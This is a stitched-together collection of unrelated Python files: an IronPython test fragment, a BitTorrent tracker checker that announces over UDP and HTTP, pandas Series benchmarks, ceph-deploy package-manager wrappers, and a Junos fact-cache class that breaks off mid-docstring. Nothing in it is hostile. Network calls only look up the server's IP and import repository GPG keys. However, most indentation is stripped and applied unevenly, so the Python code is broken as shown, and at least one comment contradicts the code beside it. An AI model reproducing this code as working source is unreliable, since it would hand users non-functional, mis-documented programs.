if clrType.IsEnum or clrType.IsSealed or clrType.IsValueType or clrType.ContainsGenericParameters:
continue
types.append(attr)
elif type(attr) == type(IronPythonTest):
queue.append(attr)
clr.CompileSubclassTypes('InheritanceTypes', *types)
clr.AddReferenceToFileAndPath(os.path.join(testpath.temporary_dir, 'InheritanceTypes.dll'))
import test_inheritance
#http://ironpython.codeplex.com/WorkItem/View.aspx?WorkItemId=21892
# verify that GetSubclassedTypes round trips with clr.CompileSubclassTypes
clr.CompileSubclassTypes('finaltest', *clr.GetSubclassedTypes())
clr.AddReference('finaltest')
os.chdir(cwd)
run_test(__name__)
os.remove('tempFile1.tpy')
|
|
import pprint
import random
import socket
import string
import struct
import subprocess
from logging import getLogger
from os import urandom
from time import time
from urllib.parse import urlparse, urlencode
from dns import resolver
from dns.exception import DNSException
import requests
from newTrackon.bdecode import bdecode, decode_binary_peers_list
from newTrackon.persistence import submitted_data
from newTrackon.utils import process_txt_prefs, build_httpx_url
HTTP_PORT = 6881
UDP_PORT = 30461
my_ipv4 = None
my_ipv6 = None
SCRAPING_HEADERS = {
"User-Agent": "qBittorrent/4.3.9",
"Accept-Encoding": "gzip",
"Connection": "close",
}
logger = getLogger("newtrackon_logger")
to_redact = [str(HTTP_PORT), str(UDP_PORT)]
def attempt_submitted(tracker):
submitted_url = urlparse(tracker.url)
try:
failover_ip = socket.getaddrinfo(submitted_url.hostname, None)[0][4][0]
except OSError:
failover_ip = ""
valid_bep_34, bep_34_info = get_bep_34(submitted_url.hostname)
if valid_bep_34: # Hostname has a valid TXT record as per BEP34
if not bep_34_info:
logger.info(
f"Hostname denies connection via BEP34, giving up on submitted tracker {tracker.url}"
)
submitted_data.appendleft(
{
"url": tracker.url,
"time": int(time()),
"status": 0,
"ip": failover_ip,
"info": ["Tracker denied connection according to BEP34"],
}
)
raise RuntimeError
elif bep_34_info:
logger.info(
f"Tracker {tracker.url} sets protocol and port preferences from BEP34: {str(bep_34_info)}"
)
return attempt_from_txt_prefs(submitted_url, failover_ip, bep_34_info)
else: # No valid BEP34, attempting all protocols
return attempt_all_protocols(submitted_url, failover_ip)
def attempt_from_txt_prefs(submitted_url, failover_ip, txt_prefs):
for preference in txt_prefs:
preferred_url = submitted_url._replace(
netloc="{}:{}".format(submitted_url.hostname, preference[1])
)
if preference[0] == "udp":
udp_success, udp_interval, udp_url, latency = attempt_udp(
failover_ip, preferred_url.netloc
)
if udp_success:
return udp_interval, udp_url, latency
elif preference[0] == "tcp":
http_success, http_interval, http_url, latency = attempt_https_http(
failover_ip, preferred_url
)
if http_success:
return http_interval, http_url, latency
logger.info(
f"All DNS TXT protocol preferences failed, giving up on submitted tracker {submitted_url.geturl()}"
)
raise RuntimeError
def attempt_all_protocols(submitted_url, failover_ip):
# UDP scrape
if submitted_url.port: # If the tracker netloc has a port, try with UDP
udp_success, udp_interval, udp_url, latency = attempt_udp(
failover_ip, submitted_url.netloc
)
if udp_success:
return udp_interval, udp_url, latency
logger.info(f"{udp_url} UDP failed")
# HTTPS and HTTP scrape
http_success, http_interval, http_url, latency = attempt_https_http(
failover_ip, submitted_url
)
if http_success:
return http_interval, http_url, latency
logger.info(
f"All protocols failed, giving up on submitted tracker {submitted_url.geturl()}"
)
raise RuntimeError
def attempt_https_http(failover_ip, url):
# HTTPS scrape
https_success, https_interval, https_url, latency = attempt_httpx(
failover_ip, url, tls=True
)
if https_success:
return https_success, https_interval, https_url, latency
logger.info(f"{https_url} HTTPS failed")
# HTTP scrape
http_success, http_interval, http_url, latency = attempt_httpx(
failover_ip, url, tls=False
)
if http_success:
return http_success, http_interval, http_url, latency
logger.info(f"{http_url} HTTP failed")
return None, None, None, None
def attempt_httpx(failover_ip, submitted_url, tls=True):
http_url = build_httpx_url(submitted_url, tls)
pp = pprint.PrettyPrinter(width=999999, compact=True)
t1 = time()
debug_http = {"url": http_url, "time": int(t1), "ip": failover_ip}
latency = 0
http_response = {}
try:
http_response = announce_http(http_url)
latency = int((time() - t1) * 1000)
pretty_data = redact_origin(pp.pformat(http_response))
debug_http.update({"info": [pretty_data], "status": 1})
except RuntimeError as e:
debug_http.update({"info": [redact_origin(str(e))], "status": 0})
submitted_data.appendleft(debug_http)
return debug_http["status"], http_response.get("interval"), http_url, latency
def attempt_udp(failover_ip, tracker_netloc):
pp = pprint.PrettyPrinter(width=999999, compact=True)
udp_url = "udp://" + tracker_netloc + "/announce"
t1 = time()
udp_attempt_result = {"url": udp_url, "time": int(t1)}
latency = 0
parsed_response = {}
try:
parsed_response, ip = announce_udp(udp_url)
latency = int((time() - t1) * 1000)
pretty_data = redact_origin(pp.pformat(parsed_response))
udp_attempt_result.update({"info": [pretty_data], "status": 1, "ip": ip})
except RuntimeError as e:
udp_attempt_result.update({"info": [str(e)], "status": 0})
if udp_attempt_result["info"] != ["Can't resolve IP"]:
udp_attempt_result["ip"] = failover_ip
submitted_data.appendleft(udp_attempt_result)
return (
udp_attempt_result["status"],
parsed_response.get("interval"),
udp_url,
latency,
)
def get_bep_34(hostname):
"""Querying for http://bittorrent.org/beps/bep_0034.html"""
try:
answers = resolver.resolve(hostname, "TXT")
for record in answers:
record_text = str(record)[1:-1]
if record_text.startswith("BITTORRENT"):
return True, process_txt_prefs(record_text)
except DNSException:
pass
return False, None
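# Example of the record this checks: per BEP34 a tracker can publish a TXT
# record such as
#
#   "BITTORRENT UDP:6969 TCP:6969"
#
# where the order encodes protocol preference; process_txt_prefs() is assumed
# to turn that into an ordered list like [("udp", 6969), ("tcp", 6969)], and a
# bare "BITTORRENT" record (empty preferences) denies all connections, which
# is the `not bep_34_info` branch handled in attempt_submitted() above.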
def announce_http(url, thash=urandom(20)):
logger.info(f"{url} Scraping HTTP(S)")
pid = "-qB4390-" + "".join(
[random.choice(string.ascii_letters + string.digits) for _ in range(12)]
)
args_dict = {
"info_hash": thash,
"peer_id": pid,
"port": HTTP_PORT,
"uploaded": 0,
"downloaded": 0,
"left": 0,
"compact": 1,
"ipv6": my_ipv6,
"ipv4": my_ipv4,
}
arguments = urlencode(args_dict)
url = url + "?" + arguments
try:
response = requests.get(url, headers=SCRAPING_HEADERS, timeout=10)
except requests.Timeout:
raise RuntimeError("HTTP timeout")
except requests.HTTPError:
raise RuntimeError("HTTP error")
except requests.ConnectionError:
raise RuntimeError("HTTP connection failed")
except requests.RequestException:
raise RuntimeError("Ambiguous HTTP error")
if response.status_code != 200:
raise RuntimeError("HTTP %s status code returned" % response.status_code)
elif not response.content:
raise RuntimeError("Got empty HTTP response")
else:
try:
tracker_response = bdecode(response.content)
except:
raise RuntimeError("Can't bdecode the response")
if "failure reason" in tracker_response:
raise RuntimeError(
'Tracker error message: "%s"' % (tracker_response["failure reason"])
)
if "peers" not in tracker_response and "peers6" not in tracker_response:
raise RuntimeError(
"Invalid response, both 'peers' and 'peers6' field are missing: "
+ str(tracker_response)
)
logger.info(f"{url} response: {tracker_response}")
return tracker_response
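# For reference, the announce URL built above ends up looking like (values
# illustrative; info_hash and peer_id are percent-encoded by urlencode):
#
#   http://tracker.example/announce?info_hash=%AB%CD...&peer_id=-qB4390-aB3x...
#       &port=6881&uploaded=0&downloaded=0&left=0&compact=1&ipv6=None&ipv4=None
#
# Note that while my_ipv4/my_ipv6 are unset, urlencode serializes them as the
# literal string "None".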
def announce_udp(udp_url, thash=urandom(20)):
parsed_tracker = urlparse(udp_url)
logger.info(f"{udp_url} Scraping UDP")
sock = None
ip = None
getaddr_responses = []
try:
for res in socket.getaddrinfo(
parsed_tracker.hostname, parsed_tracker.port, 0, socket.SOCK_DGRAM
):
getaddr_responses.append(res)
except OSError as err:
raise RuntimeError("UDP error: " + str(err))
for res in getaddr_responses:
af, socktype, proto, _, sa = res
ip = sa[0]
try:
sock = socket.socket(af, socktype, proto)
sock.settimeout(10)
except OSError:
sock = None
continue
try:
sock.connect(sa)
except OSError:
sock.close()
sock = None
continue
break
if sock is None:
raise RuntimeError("UDP connection error")
# Get connection ID
req, transaction_id = udp_create_binary_connection_request()
try:
sock.sendall(req)
buf = sock.recv(2048)
except ConnectionRefusedError:
raise RuntimeError("UDP connection failed")
except socket.timeout:
raise RuntimeError("UDP timeout")
except OSError as err:
raise RuntimeError("UDP error: " + str(err))
connection_id = udp_parse_connection_response(buf, transaction_id)
# Scrape away
req, transaction_id = udp_create_announce_request(connection_id, thash)
try:
sock.sendall(req)
buf = sock.recv(2048)
except ConnectionRefusedError:
raise RuntimeError("UDP connection failed")
except socket.timeout:
raise RuntimeError("UDP timeout")
except OSError as err:
raise RuntimeError("UDP error: " + str(err))
ip_family = sock.family
sock.close()
parsed_response, raw_response = udp_parse_announce_response(
buf, transaction_id, ip_family
)
logger.info(f"{udp_url} response: {parsed_response}")
return parsed_response, ip
def udp_create_binary_connection_request():
connection_id = 0x41727101980 # default connection id
action = 0x0 # action (0 = give me a new connection id)
transaction_id = udp_get_transaction_id()
buf = struct.pack("!q", connection_id) # first 8 bytes is connection id
buf += struct.pack("!i", action) # next 4 bytes is action
buf += struct.pack("!i", transaction_id) # next 4 bytes is transaction id
return buf, transaction_id
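# Layout check for the request above (a BEP15 connect request is exactly
# 16 bytes):
#
#   req, tid = udp_create_binary_connection_request()
#   assert len(req) == 16  # 8 (connection_id) + 4 (action) + 4 (transaction_id)
#   assert req[:8] == struct.pack("!q", 0x41727101980)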
def udp_parse_connection_response(buf, sent_transaction_id):
if len(buf) < 16:
raise RuntimeError("Wrong response length getting connection id: %s" % len(buf))
action = struct.unpack_from("!i", buf)[0] # first 4 bytes is action
res_transaction_id = struct.unpack_from("!i", buf, 4)[
0
] # next 4 bytes is transaction id
if res_transaction_id != sent_transaction_id:
raise RuntimeError(
"Transaction ID doesn't match in connection response. Expected %s, got %s"
% (sent_transaction_id, res_transaction_id)
)
if action == 0x0:
connection_id = struct.unpack_from("!q", buf, 8)[
0
] # unpack 8 bytes from byte 8, should be the connection_id
return connection_id
elif action == 0x3:
        # the rest of the packet is a UTF-8 error string
        error = buf[8:].decode("utf-8", errors="replace")
        raise RuntimeError(
            "Error while trying to get a connection response: %s" % error
        )
    else:
        raise RuntimeError("Unknown action %s in connection response" % action)
def udp_create_announce_request(connection_id, thash):
action = 0x1 # action (1 = announce)
transaction_id = udp_get_transaction_id()
buf = struct.pack("!q", connection_id) # first 8 bytes is connection id
buf += struct.pack("!i", action) # next 4 bytes is action
buf += struct.pack("!i", transaction_id) # followed by 4 byte transaction id
buf += struct.pack("!20s", thash) # hash
buf += struct.pack("!20s", thash) # peer id, should be random
buf += struct.pack("!q", 0x0) # number of bytes downloaded
buf += struct.pack("!q", 0x0) # number of bytes left
buf += struct.pack("!q", 0x0) # number of bytes uploaded
buf += struct.pack("!i", 0x2) # event 0 denotes start of downloading
    # IP address set to 0: the tracker replies to the sender of this packet
    buf += struct.pack("!i", 0x0)
key = udp_get_transaction_id() # Unique key randomized by client
buf += struct.pack("!i", key)
buf += struct.pack("!i", -1) # Number of peers required. Set to -1 for default
buf += struct.pack("!H", 0x76FD) # port on which response will be sent
return buf, transaction_id
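# Sanity check (a sketch; the connection id and info-hash below are arbitrary
# placeholders): per BEP 15 an announce request is always exactly 98 bytes:
#
#     pkt, tid = udp_create_announce_request(0x41727101980, b"\x00" * 20)
#     assert len(pkt) == 98  # 8+4+4+20+20+8+8+8+4+4+4+4+2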
def udp_parse_announce_response(buf, sent_transaction_id, ip_family):
if len(buf) < 20:
raise RuntimeError("Wrong response length while announcing: %s" % len(buf))
action = struct.unpack_from("!i", buf)[0] # first 4 bytes is action
    # next 4 bytes is the transaction id
    res_transaction_id = struct.unpack_from("!i", buf, 4)[0]
if res_transaction_id != sent_transaction_id:
raise RuntimeError(
"Transaction ID doesnt match in announce response! Expected %s, got %s"
% (sent_transaction_id, res_transaction_id)
)
if action == 0x1:
ret = dict()
        offset = 8  # action and transaction_id occupy bytes 0-7, so data doesn't start until byte 8
ret["interval"] = struct.unpack_from("!i", buf, offset)[0]
offset += 4
ret["leechers"] = struct.unpack_from("!i", buf, offset)[0]
offset += 4
ret["seeds"] = struct.unpack_from("!i", buf, offset)[0]
offset += 4
ret["peers"] = decode_binary_peers_list(buf, offset, ip_family)
return ret, buf.hex()
    else:
        # an error occurred; the rest of the packet is a UTF-8 error string
        error = buf[8:].decode("utf-8", errors="replace")
        raise RuntimeError("Error while announcing: %s" % error)
def udp_get_transaction_id():
    # BEP 15 allows any random 32-bit value for the transaction id
    return random.randrange(0, 2**31)
def get_server_ip(ip_version):
return (
subprocess.check_output(
["curl", "-s", "-" + ip_version, "https://icanhazip.com/"]
)
.decode("utf-8")
.strip()
)
def redact_origin(response):
if my_ipv4:
response = response.replace(my_ipv4, "v4-redacted")
if my_ipv6:
response = response.replace(my_ipv6, "v6-redacted")
for port in to_redact:
response = response.replace(port, "redacted")
return response
|
|
from datetime import datetime
import numpy as np
import pandas.util.testing as tm
from pandas import Series, date_range, NaT
class SeriesConstructor(object):
params = [None, 'dict']
param_names = ['data']
def setup(self, data):
self.idx = date_range(start=datetime(2015, 10, 26),
end=datetime(2016, 1, 1),
freq='50s')
dict_data = dict(zip(self.idx, range(len(self.idx))))
self.data = None if data is None else dict_data
def time_constructor(self, data):
Series(data=self.data, index=self.idx)
class IsIn(object):
params = ['int64', 'uint64', 'object']
param_names = ['dtype']
def setup(self, dtype):
self.s = Series(np.random.randint(1, 10, 100000)).astype(dtype)
self.values = [1, 2]
    def time_isin(self, dtype):
        self.s.isin(self.values)
class IsInFloat64(object):
def setup(self):
self.small = Series([1, 2], dtype=np.float64)
self.many_different_values = np.arange(10**6, dtype=np.float64)
self.few_different_values = np.zeros(10**7, dtype=np.float64)
self.only_nans_values = np.full(10**7, np.nan, dtype=np.float64)
def time_isin_many_different(self):
# runtime is dominated by creation of the lookup-table
self.small.isin(self.many_different_values)
def time_isin_few_different(self):
# runtime is dominated by creation of the lookup-table
self.small.isin(self.few_different_values)
    def time_isin_nan_values(self):
        # runtime is dominated by creation of the lookup-table
        self.small.isin(self.only_nans_values)
class IsInForObjects(object):
def setup(self):
self.s_nans = Series(np.full(10**4, np.nan)).astype(np.object)
self.vals_nans = np.full(10**4, np.nan).astype(np.object)
self.s_short = Series(np.arange(2)).astype(np.object)
self.s_long = Series(np.arange(10**5)).astype(np.object)
self.vals_short = np.arange(2).astype(np.object)
self.vals_long = np.arange(10**5).astype(np.object)
# because of nans floats are special:
self.s_long_floats = Series(np.arange(10**5,
dtype=np.float)).astype(np.object)
self.vals_long_floats = np.arange(10**5,
dtype=np.float).astype(np.object)
def time_isin_nans(self):
# if nan-objects are different objects,
# this has the potential to trigger O(n^2) running time
self.s_nans.isin(self.vals_nans)
def time_isin_short_series_long_values(self):
# running time dominated by the preprocessing
self.s_short.isin(self.vals_long)
def time_isin_long_series_short_values(self):
# running time dominated by look-up
self.s_long.isin(self.vals_short)
def time_isin_long_series_long_values(self):
# no dominating part
self.s_long.isin(self.vals_long)
def time_isin_long_series_long_values_floats(self):
# no dominating part
self.s_long_floats.isin(self.vals_long_floats)
class NSort(object):
params = ['first', 'last', 'all']
param_names = ['keep']
def setup(self, keep):
self.s = Series(np.random.randint(1, 10, 100000))
def time_nlargest(self, keep):
self.s.nlargest(3, keep=keep)
def time_nsmallest(self, keep):
self.s.nsmallest(3, keep=keep)
class Dropna(object):
params = ['int', 'datetime']
param_names = ['dtype']
def setup(self, dtype):
N = 10**6
data = {'int': np.random.randint(1, 10, N),
'datetime': date_range('2000-01-01', freq='S', periods=N)}
self.s = Series(data[dtype])
if dtype == 'datetime':
self.s[np.random.randint(1, N, 100)] = NaT
def time_dropna(self, dtype):
self.s.dropna()
class SearchSorted(object):
goal_time = 0.2
params = ['int8', 'int16', 'int32', 'int64',
'uint8', 'uint16', 'uint32', 'uint64',
'float16', 'float32', 'float64',
'str']
param_names = ['dtype']
def setup(self, dtype):
N = 10**5
data = np.array([1] * N + [2] * N + [3] * N).astype(dtype)
self.s = Series(data)
def time_searchsorted(self, dtype):
key = '2' if dtype == 'str' else 2
self.s.searchsorted(key)
class Map(object):
params = ['dict', 'Series']
    param_names = ['mapper']
def setup(self, mapper):
map_size = 1000
map_data = Series(map_size - np.arange(map_size))
self.map_data = map_data if mapper == 'Series' else map_data.to_dict()
self.s = Series(np.random.randint(0, map_size, 10000))
def time_map(self, mapper):
self.s.map(self.map_data)
class Clip(object):
params = [50, 1000, 10**5]
param_names = ['n']
def setup(self, n):
self.s = Series(np.random.randn(n))
def time_clip(self, n):
self.s.clip(0, 1)
class ValueCounts(object):
params = ['int', 'uint', 'float', 'object']
param_names = ['dtype']
def setup(self, dtype):
self.s = Series(np.random.randint(0, 1000, size=100000)).astype(dtype)
def time_value_counts(self, dtype):
self.s.value_counts()
class Dir(object):
def setup(self):
self.s = Series(index=tm.makeStringIndex(10000))
def time_dir_strings(self):
dir(self.s)
class SeriesGetattr(object):
# https://github.com/pandas-dev/pandas/issues/19764
def setup(self):
self.s = Series(1,
index=date_range("2012-01-01", freq='s',
periods=int(1e6)))
def time_series_datetimeindex_repr(self):
getattr(self.s, 'a', None)
from .pandas_vb_common import setup # noqa: F401
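# To time an individual benchmark locally with asv (a sketch; assumes this
# module lives in the pandas asv_bench suite, e.g. benchmarks/series_methods.py):
#
#     asv run --python=same --bench SeriesConstructor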
|
|
import os
from urlparse import urlparse
from ceph_deploy.lib import remoto
from ceph_deploy.util import templates
def apt(conn, packages, *a, **kw):
if isinstance(packages, str):
packages = [packages]
cmd = [
'env',
'DEBIAN_FRONTEND=noninteractive',
'apt-get',
'install',
'--assume-yes',
]
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def apt_remove(conn, packages, *a, **kw):
if isinstance(packages, str):
packages = [packages]
purge = kw.pop('purge', False)
cmd = [
'apt-get',
'-q',
'remove',
'-f',
'-y',
'--force-yes',
]
if purge:
cmd.append('--purge')
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def apt_update(conn):
cmd = [
'apt-get',
'-q',
'update',
]
return remoto.process.run(
conn,
cmd,
)
def yum(conn, packages, *a, **kw):
if isinstance(packages, str):
packages = [packages]
cmd = [
'yum',
'-y',
'install',
]
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def yum_remove(conn, packages, *a, **kw):
cmd = [
'yum',
'-y',
'-q',
'remove',
]
if isinstance(packages, str):
cmd.append(packages)
else:
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def yum_clean(conn, item=None):
item = item or 'all'
cmd = [
'yum',
'clean',
item,
]
return remoto.process.run(
conn,
cmd,
)
def rpm(conn, rpm_args=None, *a, **kw):
"""
    A minimal front end for ``rpm``. Extra flags can be passed in via
``rpm_args`` as an iterable.
"""
rpm_args = rpm_args or []
cmd = [
'rpm',
'-Uvh',
]
cmd.extend(rpm_args)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def zypper(conn, packages, *a, **kw):
if isinstance(packages, str):
packages = [packages]
cmd = [
'zypper',
'--non-interactive',
'install',
]
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def zypper_remove(conn, packages, *a, **kw):
cmd = [
'zypper',
'--non-interactive',
'--quiet',
'remove',
]
if isinstance(packages, str):
cmd.append(packages)
else:
cmd.extend(packages)
return remoto.process.run(
conn,
cmd,
*a,
**kw
)
def zypper_refresh(conn):
cmd = [
'zypper',
'--non-interactive',
'refresh',
]
return remoto.process.run(
conn,
cmd
)
class PackageManager(object):
"""
Base class for all Package Managers
"""
def __init__(self, remote_conn):
self.remote_info = remote_conn
self.remote_conn = remote_conn.conn
def _run(self, cmd, **kw):
return remoto.process.run(
self.remote_conn,
cmd,
**kw
)
def install(self, packages, **kw):
"""Install packages on remote node"""
raise NotImplementedError()
def remove(self, packages, **kw):
"""Uninstall packages on remote node"""
raise NotImplementedError()
def clean(self):
"""Clean metadata/cache"""
raise NotImplementedError()
def add_repo_gpg_key(self, url):
"""Add given GPG key for repo verification"""
raise NotImplementedError()
def add_repo(self, name, url, **kw):
"""Add/rewrite a repo file"""
raise NotImplementedError()
def remove_repo(self, name):
"""Remove a repo definition"""
raise NotImplementedError()
class RPMManagerBase(PackageManager):
"""
Base class to hold common pieces of Yum and DNF
"""
executable = None
name = None
def install(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_install_flags', None)
cmd = [
self.executable,
'-y',
'install',
]
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def remove(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_remove_flags', None)
cmd = [
self.executable,
'-y',
'-q',
'remove',
]
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def clean(self, item=None):
item = item or 'all'
cmd = [
self.executable,
'clean',
item,
]
return self._run(cmd)
def add_repo_gpg_key(self, url):
cmd = ['rpmkeys', '--import', url]
self._run(cmd)
def add_repo(self, name, url, **kw):
gpg_url = kw.pop('gpg_url', None)
if gpg_url:
self.add_repo_gpg_key(gpg_url)
            gpgcheck = 1
        else:
            gpgcheck = 0
# RPM repo defaults
description = kw.pop('description', '%s repo' % name)
enabled = kw.pop('enabled', 1)
proxy = kw.pop('proxy', '') # will get ignored if empty
_type = 'repo-md'
baseurl = url.strip('/') # Remove trailing slashes
ceph_repo_content = templates.custom_repo(
reponame=name,
name=description,
baseurl=baseurl,
enabled=enabled,
gpgcheck=gpgcheck,
_type=_type,
gpgkey=gpg_url,
proxy=proxy,
**kw
)
self.remote_conn.remote_module.write_yum_repo(
ceph_repo_content,
'%s.repo' % name
)
def remove_repo(self, name):
filename = os.path.join(
'/etc/yum.repos.d',
'%s.repo' % name
)
self.remote_conn.remote_module.unlink(filename)
class DNF(RPMManagerBase):
"""
The DNF Package manager
"""
executable = 'dnf'
name = 'dnf'
def install(self, packages, **kw):
extra_install_flags = kw.pop('extra_install_flags', [])
if '--best' not in extra_install_flags:
extra_install_flags.append('--best')
        return super(DNF, self).install(
packages,
extra_install_flags=extra_install_flags,
**kw
)
class Yum(RPMManagerBase):
"""
The Yum Package manager
"""
executable = 'yum'
name = 'yum'
class Apt(PackageManager):
"""
Apt package management
"""
executable = [
'env',
'DEBIAN_FRONTEND=noninteractive',
'DEBIAN_PRIORITY=critical',
'apt-get',
'--assume-yes',
'-q',
]
name = 'apt'
def install(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_install_flags', None)
cmd = self.executable + [
'--no-install-recommends',
'install'
]
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def remove(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_remove_flags', None)
cmd = self.executable + [
'-f',
'--force-yes',
'remove'
]
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def clean(self):
cmd = self.executable + ['update']
return self._run(cmd)
def add_repo_gpg_key(self, url):
gpg_path = url.split('file://')[-1]
if not url.startswith('file://'):
            cmd = ['wget', '-O', 'release.asc', url]
self._run(cmd, stop_on_nonzero=False)
gpg_file = 'release.asc' if not url.startswith('file://') else gpg_path
cmd = ['apt-key', 'add', gpg_file]
self._run(cmd)
def add_repo(self, name, url, **kw):
gpg_url = kw.pop('gpg_url', None)
if gpg_url:
self.add_repo_gpg_key(gpg_url)
safe_filename = '%s.list' % name.replace(' ', '-')
mode = 0644
if urlparse(url).password:
mode = 0600
self.remote_conn.logger.info(
"Creating repo file with mode 0600 due to presence of password"
)
self.remote_conn.remote_module.write_sources_list(
url,
self.remote_info.codename,
safe_filename,
mode
)
# Add package pinning for this repo
fqdn = urlparse(url).hostname
self.remote_conn.remote_module.set_apt_priority(fqdn)
def remove_repo(self, name):
safe_filename = '%s.list' % name.replace(' ', '-')
filename = os.path.join(
'/etc/apt/sources.list.d',
safe_filename
)
self.remote_conn.remote_module.unlink(filename)
class Zypper(PackageManager):
"""
Zypper package management
"""
executable = [
'zypper',
'--non-interactive',
'--quiet'
]
name = 'zypper'
def install(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_install_flags', None)
cmd = self.executable + ['install']
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def remove(self, packages, **kw):
if isinstance(packages, str):
packages = [packages]
extra_flags = kw.pop('extra_remove_flags', None)
cmd = self.executable + ['remove']
if extra_flags:
if isinstance(extra_flags, str):
extra_flags = [extra_flags]
cmd.extend(extra_flags)
cmd.extend(packages)
return self._run(cmd)
def clean(self):
cmd = self.executable + ['refresh']
return self._run(cmd)
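# Example usage (a sketch; ``remote_conn`` stands for a ceph-deploy host
# connection object exposing a ``.conn`` attribute, as PackageManager.__init__
# expects):
#
#     pkg = Apt(remote_conn)   # or Yum / DNF / Zypper, chosen per distro
#     pkg.install(['ceph', 'ceph-common'])
#     pkg.remove('ceph-common')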
|
|
import collections
import warnings
from pprint import pformat
import jnpr.junos.facts
from jnpr.junos.facts import __doc__ as facts_doc
import jnpr.junos.exception
class _FactCache(collections.MutableMapping):
"""
A dictionary-like object which performs on-demand fact gathering.
This class should not be used directly. An instance of this class is
available as the :attr:`facts` attribute of a Device object.
**Dictionary magic methods:**
* :meth:`__getitem__`: Gets the value of a given key in the dict.
* :meth:`__delitem__`: Called when a key is deleted from the dict.
* :meth:`__setitem__`: Called when a key is set on the dict.
* :meth:`__iter__`: Called when iterating over the keys of the dict.
* :meth:`__len__`: Called when getting the length of the dict.
* :meth:`__repr__`: Called when representing the dict as a string.
**Additional methods:**
* :meth:`_refresh`: Refreshes the fact cache.
"""
def __init__(self, device):
"""
_FactCache object constructor.
:param device: The device object for which fact gathering will be
performed.
"""
self._device = device
self._cache = dict()
self._call_stack = list()
self._callbacks = jnpr.junos.facts._callbacks
self._exception_on_failure = False
self._warnings_on_failure = False
self._should_warn = False
def __getitem__(self, key):
"""
Return the value of a particular key in the dictionary.
If the fact has already been cached, the value is simply returned from
the cache. If the value has not been cached, then the appropriate
callback function is invoked to gather the fact from the device. The
value is cached, and then returned.
If _warnings_on_failure is True, then a warning is logged if there is
an error gathering a fact from the device.
        :param key: The key whose value is returned.
:returns value: The value of the key fact. If key is a known fact, but
there is an error gathering the fact, then the value None is
returned.
:raises KeyError:
When key is not a known fact (there is no callback present to
gather the fact.)
:raises jnpr.junos.exception.FactLoopError:
When there is a loop attempting to gather the fact.
:raises other exceptions as defined by the fact gathering modules:
When an error is encountered and _exception_on_failure is True.
"""
if key not in self._callbacks:
# Not a fact that we know how to provide.
raise KeyError('%s: There is no function to gather the %s fact' %
(key, key))
if key not in self._cache:
# A known fact, but not yet cached. Go get it and cache it.
if self._callbacks[key] in self._call_stack:
raise jnpr.junos.exception.FactLoopError(
"A loop was detected while gathering the %s fact. The %s "
"module has already been called. Please report this error."
% (key, self._callbacks[key].__module__))
else:
# Add the callback we are about to invoke to the _call_stack in
# order to detect loops in fact gathering.
self._call_stack.append(self._callbacks[key])
try:
# Invoke the callback
new_facts = self._callbacks[key](self._device)
except jnpr.junos.exception.FactLoopError:
raise
except Exception as err:
# An exception was raised. No facts were returned.
# Raise the exception to the user?
if self._exception_on_failure:
raise
# Warn the user?
if self._warnings_on_failure:
self._should_warn = True
# Set all of the facts which should have been returned
# by this callback to the default value of None.
for new_key in self._callbacks:
if self._callbacks[key] is self._callbacks[new_key]:
self._cache[new_key] = None
else:
# No exception
for new_key in new_facts:
if (new_key not in self._callbacks or
self._callbacks[key] is not self._callbacks[new_key]):
# The callback returned a fact it didn't advertise
raise RuntimeError("The %s module returned the %s "
"fact, but does not list %s as a "
"provided fact. Please report this "
"error." %
(self._callbacks[key].__module__,
new_key,
new_key))
else:
# Cache the returned fact
self._cache[new_key] = new_facts[new_key]
finally:
# Always pop the current callback from _call_stack,
# regardless of whether or not an exception was raised.
self._call_stack.pop()
if key in self._cache:
# key fact is cached. Return it.
if self._device._fact_style == 'both':
# Compare old and new-style values.
if key in self._device._ofacts:
# Skip key comparisons for certain keys.
#
# The old facts gathering code has an up_time key.
# The new facts gathering code maintains this key for RE0
# and RE1 facts, but it's not comparable (because it
# depends on when the fact was gathered and is therefore
# not really a "fact".) The new re_info fact omits the
# up_time field for this reason.
#
# The old facts gathering code didn't return a correct
# value for the master fact when the system was a VC.
# The new fact gathering code still returns the master fact
# but returns a correct value for VCs. It also returns a
# new re_master fact which is much more useful.
if key not in ['RE0', 'RE1', 'master']:
if self._cache[key] != self._device._ofacts[key]:
warnings.warn('New and old-style facts do not '
'match for the %s fact.\n'
' New-style value: %s\n'
' Old-style value: %s\n' %
(key,
self._cache[key],
self._device._ofacts[key]),
RuntimeWarning)
return self._cache[key]
else:
# key fact was not returned by callback
raise RuntimeError("The %s module claims to provide the %s "
"fact, but failed to return it. Please report "
"this error." %
(self._callbacks[key].__module__, key))
def __delitem__(self, key):
"""
Facts are read-only. Don't allow deleting an item.
"""
raise RuntimeError("facts are read-only!")
def __setitem__(self, key, value):
"""
Facts are read-only. Don't allow setting an item.
"""
raise RuntimeError("facts are read-only!")
def __iter__(self):
"""
An iterator of known facts.
:returns iterator: of all of the 'non-hidden' facts we know how to
gather, regardless of whether or not they've already been cached. Fact
names which are hidden start with an underscore and are not returned.
"""
callbacks = {}
for key in self._callbacks:
if not key.startswith('_'):
callbacks[key] = self._callbacks[key]
return iter(callbacks)
def __len__(self):
"""
The length of all known facts.
